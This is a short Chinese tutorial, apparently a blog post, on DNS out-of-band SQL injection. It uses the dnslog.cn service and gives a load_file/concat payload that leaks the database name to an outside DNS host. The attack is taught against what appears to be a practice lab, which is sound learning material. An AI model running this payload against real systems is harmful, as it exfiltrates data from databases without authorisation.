SQL注入篇——dns回显注入

时间:2024-03-18 19:34:50

dns回显注入的使用场景

当目标无显示位也无错误回显时便可使用此方法

1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址

SQL注入篇——dns回显注入

2、将获取到的地址复制填入SQL语句中执行

SQL注入篇——dns回显注入
注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可
注入语句:

id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslog.cn\1.txt")) – -
SQL注入篇——dns回显注入

3、在DNSLog.cn网站会看到回显结果为security效果如图:

SQL注入篇——dns回显注入

SQL注入篇——dns回显注入
????????????☝????????有疑问欢迎写信哦